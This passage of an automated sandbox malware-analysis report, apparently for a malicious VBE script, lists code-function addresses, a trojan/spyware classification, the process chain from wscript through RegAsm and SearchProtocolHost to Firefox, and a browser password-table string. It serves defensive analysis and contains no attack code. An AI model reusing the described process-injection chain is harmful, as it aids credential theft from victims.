                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9F0CC3_2_02F9F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA81CC3_2_02FA81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB01AA3_2_02FB01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFB1B03_2_02EFB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBB16B3_2_02FBB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F2516C3_2_02F2516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDF1723_2_02EDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F781583_2_02F78158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8A1183_2_02F8A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE01003_2_02EE0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0C6E03_2_02F0C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA16CC3_2_02FA16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEC7C03_2_02EEC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAF7B03_2_02FAF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF07703_2_02EF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F147503_2_02F14750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9E4F63_2_02F9E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE14603_2_02EE1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA24463_2_02FA2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAF43F3_2_02FAF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8D5B03_2_02F8D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB05913_2_02FB0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA75713_2_02FA7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF05353_2_02EF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F9DAC63_2_02F9DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F35AA03_2_02F35AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F8DAAC3_2_02F8DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEEA803_2_02EEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F63A6C3_2_02F63A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAFA493_2_02FAFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA7A463_2_02FA7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F65BF03_2_02F65BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F2DBF93_2_02F2DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA6BD73_2_02FA6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0FB803_2_02F0FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAFB763_2_02FAFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAAB403_2_02FAAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F1E8F03_2_02F1E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF38E03_2_02EF38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02ED68B83_2_02ED68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF28403_2_02EF2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFA8403_2_02EFA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F5D8003_2_02F5D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF29A03_2_02EF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FBA9A63_2_02FBA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F069623_2_02F06962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B9503_2_02F0B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF99503_2_02EF9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAEEDB3_2_02FAEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF9EB03_2_02EF9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F02E903_2_02F02E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FACE933_2_02FACE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0E593_2_02EF0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAEE263_2_02FAEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFCFE03_2_02EFCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE2FC83_2_02EE2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAFFB13_2_02FAFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF1F923_2_02EF1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F64F403_2_02F64F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F10F303_2_02F10F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F32F283_2_02F32F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAFF093_2_02FAFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAFCF23_2_02FAFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EE0CF23_2_02EE0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F90CB53_2_02F90CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F69C323_2_02F69C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF0C003_2_02EF0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EEADE03_2_02EEADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0FDC03_2_02F0FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F08DBF3_2_02F08DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA7D733_2_02FA7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA1D5A3_2_02FA1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF3D403_2_02EF3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFAD003_2_02EFAD00
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057994D25_2_057994D2
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579B5455_2_0579B545
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057995225_2_05799522
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057994E95_2_057994E9
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A1CD05_2_057A1CD0
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A1CD55_2_057A1CD5
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A1C8F5_2_057A1C8F
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057996755_2_05799675
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057996695_2_05799669
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057BA1555_2_057BA155
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_0579B3255_2_0579B325
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeCode function: 5_2_057A3ACD5_2_057A3ACD
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376A3526_2_0376A352
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0369D34C6_2_0369D34C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376132D6_2_0376132D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037703E66_2_037703E6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036BE3F06_2_036BE3F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036F739A6_2_036F739A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037502746_2_03750274
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037512ED6_2_037512ED
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036CB2C06_2_036CB2C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B52A06_2_036B52A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E516C6_2_036E516C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0369F1726_2_0369F172
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0377B16B6_2_0377B16B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036A01006_2_036A0100
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0374A1186_2_0374A118
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037681CC6_2_037681CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036BB1B06_2_036BB1B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037701AA6_2_037701AA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376F0E06_2_0376F0E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037670E96_2_037670E9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B70C06_2_036B70C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0375F0CC6_2_0375F0CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B07706_2_036B0770
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036D47506_2_036D4750
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036AC7C06_2_036AC7C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376F7B06_2_0376F7B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036CC6E06_2_036CC6E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037616CC6_2_037616CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037675716_2_03767571
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B05356_2_036B0535
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0374D5B06_2_0374D5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037705916_2_03770591
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036A14606_2_036A1460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_037624466_2_03762446
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376F43F6_2_0376F43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0375E4F66_2_0375E4F6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376FB766_2_0376FB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376AB406_2_0376AB40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036EDBF96_2_036EDBF9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03766BD76_2_03766BD7
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036CFB806_2_036CFB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03723A6C6_2_03723A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03767A466_2_03767A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376FA496_2_0376FA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0375DAC66_2_0375DAC6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036F5AA06_2_036F5AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0374DAAC6_2_0374DAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036AEA806_2_036AEA80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036C69626_2_036C6962
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B99506_2_036B9950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036CB9506_2_036CB950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B29A06_2_036B29A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0377A9A66_2_0377A9A6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B28406_2_036B2840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036BA8406_2_036BA840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B38E06_2_036B38E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036DE8F06_2_036DE8F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036968B86_2_036968B8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03724F406_2_03724F40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036D0F306_2_036D0F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376FF096_2_0376FF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036BCFE06_2_036BCFE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036A2FC86_2_036A2FC8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376FFB16_2_0376FFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B1F926_2_036B1F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B0E596_2_036B0E59
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376EE266_2_0376EE26
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376EEDB6_2_0376EEDB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B9EB06_2_036B9EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376CE936_2_0376CE93
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036C2E906_2_036C2E90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03767D736_2_03767D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B3D406_2_036B3D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03761D5A6_2_03761D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036BAD006_2_036BAD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036AADE06_2_036AADE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036CFDC06_2_036CFDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036C8DBF6_2_036C8DBF
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03729C326_2_03729C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036B0C006_2_036B0C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0376FCF26_2_0376FCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036A0CF26_2_036A0CF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03750CB56_2_03750CB5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E422A06_2_02E422A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3D3B06_2_02E3D3B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3B38D6_2_02E3B38D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3B3906_2_02E3B390
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3D1906_2_02E3D190
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3B4E06_2_02E3B4E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E3B4D46_2_02E3B4D4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E43AFA6_2_02E43AFA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E43B406_2_02E43B40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E43B3B6_2_02E43B3B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E459406_2_02E45940
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E5BFC06_2_02E5BFC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346E3446_2_0346E344
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346E7FC6_2_0346E7FC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346E4666_2_0346E466
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346CB736_2_0346CB73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346CAEA6_2_0346CAEA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346D8C86_2_0346D8C8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 036F7E54 appears 88 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0371EA12 appears 84 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0369B970 appears 266 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 036E5130 appears 36 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0372F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F37E54 appears 96 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02EDB970 appears 268 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F5EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F6F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F25130 appears 36 times
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@9/3@15/13
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeMutant created: NULL
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeJump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SearchProtocolHost.exe, 00000006.00000003.1757397257.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3768386614.0000000003117000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3768386614.0000000003146000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3768386614.0000000003122000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.1758828378.0000000003117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DOC_114542366.vbeReversingLabs: Detection: 18%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOC_114542366.vbe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe "C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe"
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe "C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\temp_u8gpg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
